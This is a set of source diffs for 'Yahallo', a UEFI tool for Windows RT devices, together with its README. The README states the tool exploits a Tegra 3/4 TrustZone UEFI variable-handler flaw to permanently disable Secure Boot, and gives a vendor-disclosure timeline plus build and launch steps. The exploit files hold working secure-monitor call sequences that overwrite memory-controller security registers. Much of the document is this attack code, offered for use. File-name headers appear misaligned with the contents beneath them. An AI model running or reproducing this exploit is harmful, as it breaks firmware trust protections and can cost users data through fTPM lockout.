+VOID BlpArmEnableInterrupts(IN UINT32 OldInterruptState)
+{
+  if (OldInterruptState) {
+    ArmEnableInterrupts();
+  }
+}
+
+VOID BlpArmSwitchToFirmwareContext(
+    IN PBL_FIRMWARE_DESCRIPTOR FirmwareDescriptor)
+{
+  UINT32 OldInterruptState;
+
+  OldInterruptState = BlpArmDisableInterrupts(FirmwareDescriptor);
+  BlpArmSetPagingContext(FirmwareDescriptor);
+  BlpArmSetThreadContext(FirmwareDescriptor);
+  BlpArmSetExeceptionContext(FirmwareDescriptor);
+  BlpArmEnableInterrupts(OldInterruptState);
+}
+
+STATIC
+VOID BlpEfiMain(IN PBL_FIRMWARE_DESCRIPTOR FirmwareDescriptor)
+{
+  EFI_SYSTEM_TABLE *SystemTable;
+  EFI_HANDLE        ImageHandle;
+
+  if (FirmwareDescriptor->SystemTable) {
+    SystemTable = FirmwareDescriptor->SystemTable;
+    ImageHandle = FirmwareDescriptor->ImageHandle;
+
+    _EfiModuleEntryPoint(ImageHandle, SystemTable);
+  }
+}
+
+/**
+ Windows Boot Application's version of _ModuleEntryPoint.
+
+ This function is the entry point for a Windows Boot Application. This function
+ performs required processor state switch, then hands over control to
+ EFI's entry point, see BlpEfiMain for details.
+
+ @param BootAppParameters           Boot Application Params
+ @param LibraryParameters           Library Params, remains unused.
+
+ @retval STATUS_SUCCESS             The boot application exited normally.
+ @retval STATUS_INVALID_PARAMETER   The boot application entry doesn't contain
+valid app params.
+
+**/
+NTSTATUS
+_ModuleEntryPoint(
+    IN PBOOT_APPLICATION_PARAMETER_BLOCK BootAppParameters,
+    IN PBL_LIBRARY_PARAMETERS LibraryParameters)
+{
+  PBL_LIBRARY_PARAMETERS  LibraryParams;
+  PBL_FIRMWARE_DESCRIPTOR FirmwareDescriptor;
+  UINT32                  ParamPointer;
+
+  if (!BootAppParameters) {
+    return STATUS_INVALID_PARAMETER;
+  }
+
+  LibraryParams      = LibraryParameters;
+  ParamPointer       = (UINT32)BootAppParameters;
+  FirmwareDescriptor = (PBL_FIRMWARE_DESCRIPTOR)(
+      ParamPointer + BootAppParameters->FirmwareParametersOffset);
+
+  BlpArmSwitchToFirmwareContext(FirmwareDescriptor);
+  BlpEfiMain(FirmwareDescriptor);
+
+  return STATUS_SUCCESS;
+}

LICENSE

@@ -0,0 +1,9 @@
+// Armv7Lib.h: Supplmental ARMv7 operations
+
+UINTN
+EFIAPI
+ArmReadTpidrprw(VOID);
+
+VOID EFIAPI ArmWriteTpidrprw(UINTN Value);
+
+VOID EFIAPI ArmInvalidateBtac(VOID);

Library/WindowsBootApplicationEntryPoint/ApplicationEntryPoint.c

@@ -0,0 +1,34 @@
+#------------------------------------------------------------------------------
+#
+# Copyright (c) 2008 - 2010, Apple Inc. All rights reserved.<BR>
+# Copyright (c) 2011 - 2014, ARM Limited. All rights reserved.
+# Copyright (c) 2016, Linaro Limited. All rights reserved.
+# Copyright (c) 2020, Bingxing Wang. All rights reserved.
+#
+# SPDX-License-Identifier: BSD-2-Clause-Patent
+#
+#------------------------------------------------------------------------------
+
+#include <AsmMacroIoLib.h>
+
+.set DC_ON, (0x1<<2)
+.set IC_ON, (0x1<<12)
+.set CTRL_M_BIT,  (1 << 0)
+.set CTRL_C_BIT,  (1 << 2)
+.set CTRL_B_BIT,  (1 << 7)
+.set CTRL_I_BIT,  (1 << 12)
+
+
+ASM_FUNC(ArmReadTpidrprw)
+  mrc     p15, 0, r0, c13, c0, 4    @ read TPIDRPRW
+  bx      lr
+
+ASM_FUNC(ArmWriteTpidrprw)
+  mcr     p15, 0, r0, c13, c0, 4    @ write TPIDRPRW
+  bx      lr
+
+ASM_FUNC(ArmInvalidateBtac)
+  mcr     p15, 0, r0, c7, c5, 6     @Invalidate Branch predictor array
+  bx      lr
+
+ASM_FUNCTION_REMOVE_IF_UNREFERENCED

Library/WindowsBootApplicationEntryPoint/Arm/ArmV7Lib.h

@@ -0,0 +1,35 @@
+//------------------------------------------------------------------------------
+//
+// Copyright (c) 2008 - 2010, Apple Inc. All rights reserved.<BR>
+// Copyright (c) 2011 - 2014, ARM Limited. All rights reserved.
+// Copyright (c) 2020, Bingxing Wang. All rights reserved.
+//
+// SPDX-License-Identifier: BSD-2-Clause-Patent
+//
+//------------------------------------------------------------------------------
+
+
+    INCLUDE AsmMacroExport.inc
+    PRESERVE8
+
+DC_ON           EQU     ( 0x1:SHL:2 )
+IC_ON           EQU     ( 0x1:SHL:12 )
+CTRL_M_BIT      EQU     (1 << 0)
+CTRL_C_BIT      EQU     (1 << 2)
+CTRL_B_BIT      EQU     (1 << 7)
+CTRL_I_BIT      EQU     (1 << 12)
+
+
+ RVCT_ASM_EXPORT ArmReadTpidrprw
+  mrc     p15, 0, r0, c13, c0, 4   ; read TPIDRPRW
+  bx      lr
+
+ RVCT_ASM_EXPORT ArmWriteTpidrprw
+  mcr     p15, 0, r0, c13, c0, 4   ; write TPIDRPRW
+  bx      lr
+
+ RVCT_ASM_EXPORT ArmInvalidateBtac
+  mcr     p15, 0, r0, c7, c5, 6    ; Invalidate Branch predictor array
+  bx      lr
+
+ END

Library/WindowsBootApplicationEntryPoint/Arm/ArmV7Support.S

@@ -0,0 +1,45 @@
+## @file
+# Module entry point library for Windows Boot Application.
+#
+# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
+# Copyright (c) 1996 - 2020, The ReactOS Project. All rights reserved.<BR>
+# Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All rights reserved.<BR>
+#
+#  SPDX-License-Identifier: GPL-2.0-only
+#
+#
+##
+
+[Defines]
+  INF_VERSION                    = 0x00010005
+  BASE_NAME                      = WindowsBootApplicationEntryPoint
+  MODULE_UNI_FILE                = WindowsBootApplicationEntryPoint.uni
+  FILE_GUID                      = DADE8301-CB29-4fd5-8148-56FD246C5B88
+  MODULE_TYPE                    = UEFI_APPLICATION
+  VERSION_STRING                 = 1.0
+  LIBRARY_CLASS                  = WindowsBootApplicationEntryPoint|UEFI_APPLICATION
+
+#
+#  VALID_ARCHITECTURES           = ARM
+#
+
+[Sources]
+  ApplicationEntryPoint.c
+
+[Sources.ARM]
+  Arm/ArmV7Lib.h
+  Arm/ArmV7Support.S            | GCC
+  Arm/ArmV7Support.asm          | RVCT
+
+[Packages]
+  MdePkg/MdePkg.dec
+  YahalloPkg/YahalloPkg.dec
+  ArmPkg/ArmPkg.dec
+  ArmPlatformPkg/ArmPlatformPkg.dec
+
+[LibraryClasses]
+  UefiBootServicesTableLib
+  DebugLib
+  BaseLib
+  ArmLib
+  CacheMaintenanceLib

Library/WindowsBootApplicationEntryPoint/Arm/ArmV7Support.asm

@@ -0,0 +1,18 @@
+// /** @file
+// Module entry point library for Windows Boot Application.
+//
+// Module entry point library for Windows Boot Application.
+//
+// Copyright (c) 2007 - 2014, Intel Corporation. All rights reserved.<BR>
+// Copyright (c) 1996 - 2020, The ReactOS Project. All rights reserved.<BR>
+// Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All rights reserved.<BR>
+//
+// SPDX-License-Identifier: GPL-2.0-only
+//
+// **/
+
+
+#string STR_MODULE_ABSTRACT             #language en-US "Module entry point library for Windows Boot Application"
+
+#string STR_MODULE_DESCRIPTION          #language en-US "Module entry point library for Windows Boot Application."
+

Library/WindowsBootApplicationEntryPoint/WindowsBootApplicationEntryPoint.inf

@@ -0,0 +1,42 @@
+# Yahallo: Tegra 3 and Tegra 4 TrustZone UEFI variable services handler exploit and Secure Boot unlock tool
+
+This tool exploits NVIDIA Tegra 3/Tegra 4 UEFI variable services and implements TrustZone takeover. In this way, users can permanently turn off Secure Boot on Tegra-based Windows RT devices without external devices' assistance (e.g. RCM Mode.)
+
+This documentation is intentionally drafted in a professional way to discourage average device owners from messing up the system firmware.
+
+**Disclaimer**: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. By using this tool, you acknowledge that you are intentionally turning off the device's ~security features~. The author is not liable for any consequence, for instance, confidential data loss due to fTPM lockout, or warranty void.
+
+# Issue Disclosure
+- 2020/08: Discovery, initial prototype
+- 2020/09/22: Reported to MSRC (MSRC 61209)
+- 2020/10/07: MSRC confirmed wontfix since Surface RT and Surface 2 hardware are EOL
+
+> Unfortunately, you are correct - support for these versions of the Surface has ended, and no additional security updates will be offered. We appreciate the opportunity to review your research... - MSRC
+
+- 2020/10/19: Reported to NVIDIA PSIRT (3156921)
+- 2020/10/23: NVIDIA confirmed new Tegra SoC UEFI implementations don't reuse the old TZ code, old SoC are EOL and they think MS16-100 and MS16-140 fully addressed the prerequisite (but you can always install a BMR image and reset it...), wontfix
+
+> The development team has evaluated this report. The UEFI variable store for current versions of Tegra has changed - the UEFI variable store for Orin/Hopper is not what was used in TZ in previous targets and they do not believe it is affected by this issue.
+>
+> Also, MS16-100 and MS16-140 appear to be both changes in MS code not system firmware, biggest potential piece would be for the bad images to be rejected from the UEFI secure boot. Likely, MS updated the main dbx file hosted here: https://uefi.org/revocationlistfile as that is the normal way for security issues to be handled in UEFI. - NVIDIA PSIRT
+
+# Usage
+- Install Secure Boot Golden Key Exploit first. If the device installed WU updates after Nov 2016, install the BMR to reset Secure Boot Key Storage.
+- Run this tool as Windows Boot Manager Boot Application.
+
+# Buildout
+I've migrated the build system from Visual Studio (uefi-simple) to EDK2. To build it:
+
+- Place this repo under EDK2 tree, such as `YahalloPkg`
+- Apply the EDK2 build system patch. See `Edk2Patches` folder for details.
+- `build -a ARM -p YahalloPkg/YahalloPkg.dsc -t GCC5`
+
+Launch this image as a Windows Boot Manager OS entry, with `nointegritychecks` on and `testsigning` on.
+
+# About Project Naming
+"Yahallo" by Yui Yuigahama From [Oregairu](https://www.youtube.com/watch?v=Nhr5vrjHcIM). _No objections will be acknowledged._
+
+# License
+Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All rights reserved. 
+
+This tool is released under GPLv2.

Library/WindowsBootApplicationEntryPoint/WindowsBootApplicationEntryPoint.uni

@@ -0,0 +1,26 @@
+#include "Include/Application.h"
+
+EFI_STATUS TegraSecureBootUnlockEntryPoint(
+    EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
+{
+  EFI_STATUS Status = EFI_SUCCESS;
+
+  // Turn off watchdog timer, since this does take a while
+  gBS->SetWatchdogTimer(0, 0, 0, NULL);
+
+  // Search the proper entry
+  Status = LaunchExploitByVersionTable();
+
+  // We won't let people escape here. They need to manually reset
+  FinalizeApp();
+  return Status;
+}
+
+VOID FinalizeApp(VOID)
+{
+  // Let people wait for stroke
+  Print(L"!!! PLEASE RESET YOUR DEVICE MANUALLY USING THE POWER BUTTON !!!\n");
+  Print(L"!!! PLEASE RESET YOUR DEVICE MANUALLY USING THE POWER BUTTON !!!\n");
+  Print(L"!!! PLEASE RESET YOUR DEVICE MANUALLY USING THE POWER BUTTON !!!\n");
+  CpuDeadLoop();
+}

README.md

@@ -0,0 +1,24 @@
+#include "Include/Application.h"
+
+VOID CortexA15CachePrime(VOID)
+{
+  UINTN PageSize = 4096;
+  UINTN Base     = 0x83000000;
+
+  Print(L"CortexA15CachePrime: priming cache...\n");
+
+  for (UINTN Address = 0; Address < (8 * 1024 * 1024); Address += PageSize) {
+    if ((Address % (1 * 1024 * 1024)) == 0) {
+      Print(L"CortexA15CachePrime: preloading 0x%08x\n", Base + Address);
+    }
+
+    __builtin_prefetch((VOID *)(Base + Address), 1, 3);
+    __builtin_prefetch((VOID *)(Base + Address), 0, 3);
+  }
+
+  ArmDataMemoryBarrier();
+  ArmDataSynchronizationBarrier();
+  ArmInstructionSynchronizationBarrier();
+
+  Print(L"CortexA15CachePrime: Done.\n");
+}

TegraSecureBootUnlock/App.c

@@ -0,0 +1,33 @@
+// ConsoleUtility.c: workaround for Tegra 3 firmware
+#include "Include/Application.h"
+
+VOID Tegra3ConsoleOutputFixup(VOID)
+{
+  EFI_STATUS                       Status                   = EFI_SUCCESS;
+  UINTN                            NumOutputProtocolHandles = 0;
+  EFI_HANDLE *                     pOutputHandles;
+  EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL *pScreenEfiOutputProtocol;
+
+  Status = gBS->LocateHandleBuffer(
+      ByProtocol, &gEfiSimpleTextOutProtocolGuid, NULL,
+      &NumOutputProtocolHandles, &pOutputHandles);
+
+  // Some sanity check here.
+  if (!EFI_ERROR(Status) && NumOutputProtocolHandles >= 3) {
+    // Take the last handle as ConOut, don't know how I know this.
+    // It is painful...and it is 5am now
+    Status = gBS->HandleProtocol(
+        pOutputHandles[NumOutputProtocolHandles - 1],
+        &gEfiSimpleTextOutProtocolGuid, (VOID **)&pScreenEfiOutputProtocol);
+
+    // Hack: force use the screen output for ConOut
+    if (!EFI_ERROR(Status)) {
+      gST->ConOut           = pScreenEfiOutputProtocol;
+      gST->ConsoleOutHandle = pOutputHandles[NumOutputProtocolHandles - 1];
+      // TODO: Maybe set ConOut device later...?
+      pScreenEfiOutputProtocol->OutputString(
+          pScreenEfiOutputProtocol,
+          L"At this moment you should have seen something on the screen...\n");
+    }
+  }
+}

TegraSecureBootUnlock/Cache.c

@@ -0,0 +1,79 @@
+// DeviceLut.c: Device Look-up table
+
+#include "Include/Application.h"
+
+// Hack version LUT
+VERSION_TABLE_ENTRY gVersionEntries[255] = {
+    {
+        // Surface RT v3.31.500, Tegra 3, needs firmware fix-up
+        // gST string "OemkS EFI Jan 24 2014 18:00:42"
+        L"OemkS EFI Jan 24 2014 18:00:42",
+        SurfaceRTExploit,
+        Tegra3ConsoleOutputFixup,
+    },
+    {
+        // Surface 2 v4.22.500, Tegra 4
+        // gST string "Surface 2 EFI Sep 11 2014 00:32:29"
+        L"Surface 2 EFI Sep 11 2014 00:32:29",
+        Surface2Exploit,
+        NULL,
+    },
+    {
+        // Terminator
+        NULL,
+    },
+};
+
+EFI_STATUS LaunchExploitByVersionTable(VOID)
+{
+  EFI_STATUS           Status;
+  PVERSION_TABLE_ENTRY pEntry = NULL;
+
+  if (gST->FirmwareVendor != NULL) {
+    Print(
+        L"Your firmware (gST): %s, 0x%x\n", gST->FirmwareVendor,
+        gST->FirmwareRevision);
+    Print(L"Matching device\n");
+
+    PVERSION_TABLE_ENTRY pLut = (PVERSION_TABLE_ENTRY)&gVersionEntries;
+
+    do {
+      if (StrStr(gST->FirmwareVendor, pLut->FirmwareRelease) != NULL) {
+        pEntry = pLut;
+        break;
+      }
+      pLut++;
+    } while (pLut->FirmwareRelease != NULL);
+  }
+  else {
+    Print(L"[WARN] Failed to read firmware release from EFI System Table\n");
+  }
+
+  if (pEntry == NULL) {
+    // Fix the console anyway (because we don't know)
+    Tegra3ConsoleOutputFixup();
+    Print(L"Yahallo - Tegra 3/4 Secure Boot Unlock Utility\n");
+    Print(L"[ERROR] Failed to find the device. It is probably not supported "
+          L"yet\n");
+    Print(
+        L"Your firmware (gST): %s, 0x%x\n", gST->FirmwareVendor,
+        gST->FirmwareRevision);
+    Status = EFI_NOT_FOUND;
+    goto exit;
+  }
+  else {
+    // Run pre-fix up if exists
+    if (pEntry->PreEntryFixup != NULL) {
+      HACK_ENTRY pFixupEntry = (HACK_ENTRY)pEntry->PreEntryFixup;
+      pFixupEntry();
+    }
+
+    // Go
+    Print(L"Enter the device routine\n");
+    HACK_ENTRY pHackEntry = (HACK_ENTRY)pEntry->EntryPoint;
+    pHackEntry();
+  }
+
+exit:
+  return Status;
+}

TegraSecureBootUnlock/Console.c

@@ -0,0 +1,57 @@
+// Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All
+// rights reserved.<BR>
+
+#include <Uefi.h>
+
+#include <Library/UefiBootServicesTableLib.h>
+#include <Library/UefiRuntimeServicesTableLib.h>
+
+#include <Library/ArmLib.h>
+#include <Library/ArmSmcLib.h>
+#include <Library/BaseLib.h>
+#include <Library/BaseMemoryLib.h>
+#include <Library/PrintLib.h>
+#include <Library/UefiLib.h>
+
+#include <Protocol/SimpleTextOut.h>
+
+typedef UINTN  size_t;
+typedef UINT8  uint8_t;
+typedef UINT16 uint16_t;
+typedef UINT32 uint32_t;
+typedef UINT64 uint64_t;
+
+typedef struct _VERSION_TABLE_ENTRY {
+  CHAR16 *FirmwareRelease;
+  VOID *  EntryPoint;
+  VOID *  PreEntryFixup;
+} VERSION_TABLE_ENTRY, *PVERSION_TABLE_ENTRY;
+
+typedef void (*HACK_ENTRY)(void);
+
+// Routines
+VOID SurfaceRTExploit(VOID);
+VOID Surface2Exploit(VOID);
+VOID FinalizeApp(VOID);
+
+VOID PerformNvTegra3Exploit(VOID);
+VOID PerformNvTegra4Exploit(VOID);
+
+UINT32
+ArmCallSmcHelper(UINT32 R0, UINT32 R1, UINT32 R2, UINT32 R3);
+
+VOID Tegra3ConsoleOutputFixup(VOID);
+VOID CortexA15CachePrime(VOID);
+
+EFI_STATUS LaunchExploitByVersionTable(VOID);
+
+void *memmem(const void *h0, size_t k, const void *n0, size_t l);
+#define memchr(buf, ch, count) ScanMem8(buf, (UINTN)(count), (UINT8)ch)
+#define memcmp(buf1, buf2, count) (int)(CompareMem(buf1, buf2, (UINTN)(count)))
+
+#define _MAX(a, b) ((a) > (b) ? (a) : (b))
+#define _MIN(a, b) ((a) < (b) ? (a) : (b))
+
+#define BITOP(a, b, op)                                                        \
+  ((a)[(size_t)(b) / (8 * sizeof *(a))] op(size_t) 1                           \
+   << ((size_t)(b) % (8 * sizeof *(a))))

TegraSecureBootUnlock/DeviceLut.c

@@ -0,0 +1,186 @@
+#include "Include/Application.h"
+
+static char *
+twobyte_memmem(const unsigned char *h, size_t k, const unsigned char *n)
+{
+  uint16_t nw = n[0] << 8 | n[1], hw = h[0] << 8 | h[1];
+  for (h += 2, k -= 2; k; k--, hw = hw << 8 | *h++)
+    if (hw == nw)
+      return (char *)h - 2;
+  return hw == nw ? (char *)h - 2 : 0;
+}
+
+static char *
+threebyte_memmem(const unsigned char *h, size_t k, const unsigned char *n)
+{
+  uint32_t nw = n[0] << 24 | n[1] << 16 | n[2] << 8;
+  uint32_t hw = h[0] << 24 | h[1] << 16 | h[2] << 8;
+  for (h += 3, k -= 3; k; k--, hw = (hw | *h++) << 8)
+    if (hw == nw)
+      return (char *)h - 3;
+  return hw == nw ? (char *)h - 3 : 0;
+}
+
+static char *
+fourbyte_memmem(const unsigned char *h, size_t k, const unsigned char *n)
+{
+  uint32_t nw = n[0] << 24 | n[1] << 16 | n[2] << 8 | n[3];
+  uint32_t hw = h[0] << 24 | h[1] << 16 | h[2] << 8 | h[3];
+  for (h += 4, k -= 4; k; k--, hw = hw << 8 | *h++)
+    if (hw == nw)
+      return (char *)h - 4;
+  return hw == nw ? (char *)h - 4 : 0;
+}
+
+/*
+ * Two Way string search algorithm, with a bad shift table applied to the last
+ * byte of the window. A bit array marks which entries in the shift table are
+ * initialized to avoid fully initializing a 1kb/2kb table.
+ *
+ * Reference: CROCHEMORE M., PERRIN D., 1991, Two-way string-matching,
+ * Journal of the ACM 38(3):651-675
+ */
+static char *twoway_memmem(
+    const unsigned char *h, const unsigned char *z, const unsigned char *n,
+    size_t l)
+{
+  size_t i, ip, jp, k, p, ms, p0, mem, mem0;
+  size_t byteset[32 / sizeof(size_t)] = {0};
+  size_t shift[256];
+
+  /* Computing length of needle and fill shift table */
+  for (i = 0; i < l; i++)
+    BITOP(byteset, n[i], |=), shift[n[i]] = i + 1;
+
+  /* Compute maximal suffix */
+  ip = -1;
+  jp = 0;
+  k = p = 1;
+  while (jp + k < l) {
+    if (n[ip + k] == n[jp + k]) {
+      if (k == p) {
+        jp += p;
+        k = 1;
+      }
+      else
+        k++;
+    }
+    else if (n[ip + k] > n[jp + k]) {
+      jp += k;
+      k = 1;
+      p = jp - ip;
+    }
+    else {
+      ip = jp++;
+      k = p = 1;
+    }
+  }
+  ms = ip;
+  p0 = p;
+
+  /* And with the opposite comparison */
+  ip = -1;
+  jp = 0;
+  k = p = 1;
+  while (jp + k < l) {
+    if (n[ip + k] == n[jp + k]) {
+      if (k == p) {
+        jp += p;
+        k = 1;
+      }
+      else
+        k++;
+    }
+    else if (n[ip + k] < n[jp + k]) {
+      jp += k;
+      k = 1;
+      p = jp - ip;
+    }
+    else {
+      ip = jp++;
+      k = p = 1;
+    }
+  }
+  if (ip + 1 > ms + 1)
+    ms = ip;
+  else
+    p = p0;
+
+  /* Periodic needle? */
+  if (memcmp(n, n + p, ms + 1)) {
+    mem0 = 0;
+    p    = _MAX(ms, l - ms - 1) + 1;
+  }
+  else
+    mem0 = l - p;
+  mem = 0;
+
+  /* Search loop */
+  for (;;) {
+    /* If remainder of haystack is shorter than needle, done */
+    if (z - h < l)
+      return 0;
+
+    /* Check last byte first; advance by shift on mismatch */
+    if (BITOP(byteset, h[l - 1], &)) {
+      k = l - shift[h[l - 1]];
+      if (k) {
+        if (mem0 && mem && k < p)
+          k = l - p;
+        h += k;
+        mem = 0;
+        continue;
+      }
+    }
+    else {
+      h += l;
+      mem = 0;
+      continue;
+    }
+
+    /* Compare right half */
+    for (k = _MAX(ms + 1, mem); k < l && n[k] == h[k]; k++)
+      ;
+    if (k < l) {
+      h += k - ms;
+      mem = 0;
+      continue;
+    }
+    /* Compare left half */
+    for (k = ms + 1; k > mem && n[k - 1] == h[k - 1]; k--)
+      ;
+    if (k <= mem)
+      return (char *)h;
+    h += p;
+    mem = mem0;
+  }
+}
+
+void *memmem(const void *h0, size_t k, const void *n0, size_t l)
+{
+  const unsigned char *h = h0, *n = n0;
+
+  /* Return immediately on empty needle */
+  if (!l)
+    return (void *)h;
+
+  /* Return immediately when needle is longer than haystack */
+  if (k < l)
+    return 0;
+
+  /* Use faster algorithms for short needles */
+  h = memchr(h0, *n, k);
+  if (!h || l == 1)
+    return (void *)h;
+  k -= h - (const unsigned char *)h0;
+  if (k < l)
+    return 0;
+  if (l == 2)
+    return twobyte_memmem(h, k, n);
+  if (l == 3)
+    return threebyte_memmem(h, k, n);
+  if (l == 4)
+    return fourbyte_memmem(h, k, n);
+
+  return twoway_memmem(h, h + k, n, l);
+}

TegraSecureBootUnlock/Exploit.c

@@ -0,0 +1,87 @@
+// Smc.c: SMC and exploit handler
+#include "Include/Application.h"
+
+UINT32
+ArmCallSmcHelper(UINT32 R0, UINT32 R1, UINT32 R2, UINT32 R3)
+{
+  ARM_SMC_ARGS ArmSmcArgs;
+
+#if DEBUG
+  Print(
+      L"ArmCallSmcHelper: >>> {0x%08x, 0x%08x, 0x%08x, 0x%08x}\n", R0, R1, R2,
+      R3);
+#endif
+
+  ArmSmcArgs.Arg0 = R0;
+  ArmSmcArgs.Arg1 = R1;
+  ArmSmcArgs.Arg2 = R2;
+  ArmSmcArgs.Arg3 = R3;
+
+  ArmCallSmc(&ArmSmcArgs);
+
+#if DEBUG
+  Print(
+      L"ArmCallSmcHelper: <<< {0x%08x, 0x%08x, 0x%08x, 0x%08x}\n",
+      ArmSmcArgs.Arg0, ArmSmcArgs.Arg1, ArmSmcArgs.Arg2, ArmSmcArgs.Arg3);
+#endif
+
+  return ArmSmcArgs.Arg0;
+}
+
+VOID PerformNvTegra3Exploit(VOID)
+{
+  UINT32 Ret = 0;
+  // Get size of the buffers needed (discarded)
+  Ret = ArmCallSmcHelper(0x03, 0x09, 0, 0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+
+  // Switch secure world handlers to runtime mode
+  Ret = ArmCallSmcHelper(0x03, 0x05, 0, 0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+
+  // Register a new shared memory buffer at 0x4000_0000 (IRAM) with size
+  // 0x6001_e0e0. The following algorithm is used to determine the end address
+  // that the QueryVariable call will write over:
+  //  response_area = (request_area + (area_slice >> 1));
+  Ret = ArmCallSmcHelper(0x03, 0x06, 0x40000000, 0x6001e0e0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+
+  // QueryVariable, does a 32 byte memory copy over to 0x7000f070...f090.
+  // (MC_SECURITY_CFG0, MC_SECURITY_CFG1 and reserved registers)
+  gBS->SetMem((VOID *)0x40000000, 32, 0);
+  Ret = ArmCallSmcHelper(0x03, 0x03, 0, 0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+}
+
+VOID PerformNvTegra4Exploit(VOID)
+{
+  UINT32 Ret = 0;
+
+  // Get size of the buffers needed (discarded)
+  Ret = ArmCallSmcHelper(0x03, 0x09, 0, 0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+
+  // Switch secure world handlers to runtime mode
+  Ret = ArmCallSmcHelper(0x03, 0x05, 0, 0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+
+  // Register a new shared memory buffer at 0x4000_0000 (IRAM) with size
+  // 0x6001_e0e0. The following algorithm is used to determine the end address
+  // that the QueryVariable call will write over:
+  //  response_area = (request_area + (area_slice >> 1));
+  //
+  // This is 0x6003_20e0 for Tegra114, which has a MC base of 0x7001_9000.
+  Ret = ArmCallSmcHelper(0x03, 0x06, 0x40000000, 0x600320e0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+
+  // QueryVariable, does a 32 byte memory copy over to 0x7000f070...f090.
+  // (MC_SECURITY_CFG0, MC_SECURITY_CFG1 and reserved registers)
+  gBS->SetMem((VOID *)0x40000000, 32, 0);
+  Ret = ArmCallSmcHelper(0x03, 0x03, 0, 0);
+  Print(L"ArmCallSmcHelper: 0x%x\n", Ret);
+
+  // External fabric may have some read/write requests still to be processed,
+  // let there be a barrier to make sure the registers are set properly
+  ArmDataSynchronizationBarrier();
+  ArmInstructionSynchronizationBarrier();
+}

TegraSecureBootUnlock/Include/Application.h

@@ -0,0 +1,58 @@
+# Yahallo.inf: main application for Tegra Secure Boot unlocking
+# Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All rights reserved.<BR>
+
+[Defines]
+  INF_VERSION                    = 0x00010005
+  BASE_NAME                      = Yahallo
+  FILE_GUID                      = e59e2095-d00d-4fc1-85f3-5c0fc38b7d54
+  # Note: this is not a real "UEFI Application", it uses a different
+  # entry point. Let's see how it goes...
+  MODULE_TYPE                    = UEFI_APPLICATION
+  VERSION_STRING                 = 1.0
+  ENTRY_POINT                    = TegraSecureBootUnlockEntryPoint
+
+[Sources]
+  App.c
+  Cache.c
+  Console.c
+  Exploit.c
+  MemUtility.c
+  DeviceLut.c
+  Smc.c
+
+  Include/Application.h
+
+[Packages]
+  ArmPkg/ArmPkg.dec
+  ArmPlatformPkg/ArmPlatformPkg.dec
+  MdePkg/MdePkg.dec
+  MdeModulePkg/MdeModulePkg.dec
+  YahalloPkg/YahalloPkg.dec
+
+[LibraryClasses]
+  WindowsBootApplicationEntryPoint
+  ArmLib
+  ArmSmcLib
+  DevicePathLib
+  BaseLib
+  MemoryAllocationLib
+  UefiLib
+  UefiBootServicesTableLib
+  UefiRuntimeServicesTableLib
+  BaseMemoryLib
+  DebugLib
+  PrintLib
+
+[BuildOptions.ARM]
+   # Well, eventually this should be removed
+   GCC:*_*_*_CC_FLAGS = -Wno-pointer-to-int-cast -Wno-int-to-pointer-cast -Wno-missing-braces
+   # Instruct BaseTools to generate Windows Boor Application
+   *_*_*_GENFW_FLAGS = --windows-boot-application --convert-output-machine-arm-to-thumb2
+
+[Guids]
+  gEfiGlobalVariableGuid                        ## CONSUMES
+  gEfiSmbiosTableGuid                           ## CONSUMES
+
+[Protocols]
+  gEfiSimpleTextOutProtocolGuid                 ## CONSUMES
+  gEfiDevicePathProtocolGuid                    ## CONSUMES

TegraSecureBootUnlock/MemUtility.c

@@ -0,0 +1,21 @@
+## @file  YahalloPkg.dec
+# This Package provides required entry point dependencies for Windows Boot Application.
+#
+# Copyright (c) 2007 - 2020, Intel Corporation. All rights reserved.<BR>
+# Portions copyright (c) 2008 - 2009, Apple Inc. All rights reserved.<BR>
+# (C) Copyright 2016 - 2020 Hewlett Packard Enterprise Development LP<BR>
+# Copyright (c) 1996 - 2020, The ReactOS Project. All rights reserved.<BR>
+# Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All rights reserved.<BR>
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+##
+
+[Defines]
+  DEC_SPECIFICATION              = 0x00010005
+  PACKAGE_NAME                   = YahalloPkg
+  PACKAGE_GUID                   = c99eb7f6-2842-4b0d-ad7a-a104c8ac699c
+  PACKAGE_VERSION                = 1.00
+
+[Includes.common]
+  Include

TegraSecureBootUnlock/Smc.c

@@ -0,0 +1,96 @@
+## @file  YahalloPkg.dsc
+# This Package provides buildout config for the application.
+#
+# Copyright (c) 2007 - 2020, Intel Corporation. All rights reserved.<BR>
+# Portions copyright (c) 2008 - 2009, Apple Inc. All rights reserved.<BR>
+# (C) Copyright 2016 - 2020 Hewlett Packard Enterprise Development LP<BR>
+# Copyright (c) 1996 - 2020, The ReactOS Project. All rights reserved.<BR>
+# Copyright (c) 2019 - 2020, Bingxing Wang and other project authors. All rights reserved.<BR>
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+##
+
+[Defines]
+  PLATFORM_NAME                  = YahalloPkg
+  PLATFORM_GUID                  = 8905d433-2814-43a6-bfb1-671010122961
+  PLATFORM_VERSION               = 0.01
+  DSC_SPECIFICATION              = 0x00010006
+  OUTPUT_DIRECTORY               = Build/YahalloPkg
+  SUPPORTED_ARCHITECTURES        = ARM
+  BUILD_TARGETS                  = DEBUG|RELEASE
+  SKUID_IDENTIFIER               = DEFAULT
+
+[BuildOptions.common]
+  GCC:*_*_ARM_CC_FLAGS = -O0
+  GCC:*_*_ARM_DLINK_FLAGS = -O0
+
+#
+#  Debug output control
+#
